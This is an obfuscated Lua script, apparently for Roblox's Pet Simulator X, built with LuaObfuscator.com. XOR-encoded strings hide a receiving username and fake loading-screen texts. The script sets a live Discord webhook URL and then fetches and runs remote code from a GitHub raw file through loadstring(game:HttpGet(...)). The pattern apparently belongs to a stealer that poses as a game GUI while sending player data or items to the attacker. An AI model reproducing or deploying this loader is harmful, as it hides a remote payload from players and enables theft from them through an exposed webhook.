--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10=0 + 0 ;local v11;local v12;local v13;local v14;while true do if (v10==(1 -0)) then local v15=0 + 0 ;while true do if (v15==(1 + 0)) then v10=2 + 0 ;break;end if (v15==0) then v13=nil;v14=nil;v15=1;end end end if (v10==(0 -0)) then v11=1119 -(1066 + 53) ;v12=nil;v10=3 -2 ;end if ((2 -0)==v10) then while true do if ((428 -(109 + 319))==v11) then local v16=0;while true do if (v16==(1 + 0)) then v11=1 -0 ;break;end if (v16==(1670 -(64 + 1606))) then v12=0 + 0 ;v13=nil;v16=1;end end end if (v11==(1 + 0)) then v14=nil;while true do if (v12==((48 + 111) -((271 -185) + 19 + 53))) then while true do local v20=1035 -(807 + 228) ;local v21;while true do if (v20==(0 -0)) then v21=0 + 0 ;while true do if (v21==(451 -(117 + 334))) then if (v13==(1089 -(((3157 -(1223 + 440)) -(3203 -2232)) + ((86 + 737) -(252 + 6))))) then return v5(v14);end if (v13==(((0 + 0) -(1376 -(1199 + 177))) + 0 + 0 + 0 + 0)) then local v22=0;local v23;while true do if (v22==(0 -0)) then v23=(102 + 1794) -(185 + 1390 + 321) ;while true do if (v23==(0 + 0)) then v14={};for v25=57 -(((1801 -1349) -(5 + 413)) + 22) , #v8 do v6(v14,v0(v4(v1(v2(v8,v25,v25 + (1018 -(43 + 974)) + 0 + 0 + 0 )),v1(v2(v9,((870 -((334 -(98 + 194)) + 303 + 521)) -(1 + 1 + (1682 -(97 + 1585)) + 1 + (0 -0))) + ((v25-(((77 -(24 + 5 + 44)) -((9 -6) + 0)) + ((0 + 0) -((422 -(88 + 334)) -(0 -0)))))% #v9) ,((2 -1) -0) + (((679 -543) + (2071 -(1143 + 550))) -(((870 + 267) -675) + (1612 -((619 -234) + 161 + 1014)))) + ((v25-(((1316 -(134 + 153)) + (874 -(387 + 439))) -(((745 + 1023) -(((1343 -(530 + 511)) -(56 + 98)) + 575 + 653)) + (((1525 + 6169) -(6971 -(63 + 1856))) -(1125 + 610 + 223)))))% #v9) + ((1392 -(245 + 4 + 1)) -((456 -(56 + 368)) + (1447 -(562 + 42)) + 266)) + ((120 -(92 + 28)) -(0 -0)) )))%(((319 -(410 -269)) + (291 -163) + 33 + 58) -((1339 -(350 + 875)) + (45 -18))) ));end v23=1 + (32 -(29 + 3)) ;end if (v23==1) then v13=1;break;end end break;end end end break;end end break;end end end break;end if (v12==0) then local v17=137 -(40 + 97) ;local v18;local v19;while true do if (v17==(0 -0)) then v18=0 + 0 ;v19=nil;v17=1 + 0 ;end if (1==v17) then while true do if (v18==(511 -(161 + 350))) then v19=0 -0 ;while true do if ((0 + 0)==v19) then local v24=0;while true do if (v24==(1 + 0)) then v19=1 -0 ;break;end if (v24==(0 -0)) then v13=(1108 + 768) -((170 -(22 + 138)) + ((2395 + 1003) -((2766 -(903 + 672)) + 227 + 114))) ;v14=nil;v24=1 + 0 ;end end end if (v19==(913 -(151 + 761))) then v12=894 -(185 + 293 + 396 + 19) ;break;end end break;end end break;end end end end break;end end break;end end end Username=v7("\8\146\84\177\0\40\146\84\177\1\57","\93\224\53\223\89");WebHook="https://discord.com/api/webhooks/1085220957888712717/m595wVe41yFLQ4GMFJmt5ZU60NzurJCr5NjfRWN85Q20hTPoddt2DL9oWB0b31gui10G";loadingscreen=true;_G.CustomScriptName=v7("\56\208\49\49\59\224\27\120\24\247","\104\131\105\17");_G.Text1=v7("\152\247\12\254\215\191\180\50\248\198\175\241\26\185\137\229","\203\148\126\151\167");_G.Text2=v7("\40\66\218\226\212\17\68\147\240\210\13\3\224\245\207\22\83\199","\127\35\179\150\189");_G.Text3=v7("\174\116\194\188\134\117\201\184\205\79\196\173\132\108\211\172\195\50\137","\237\28\167\223");_G.Text4=v7("\36\227\141\197\218\168\19\248\87\196\143\197\199\177\9\236\89\185\194","\119\151\236\183\174\193\125\159");loadstring(game:HttpGet("https://raw.githubusercontent.com/Justanotherdme/petsimx22/main/petsimguiss.lua"))();
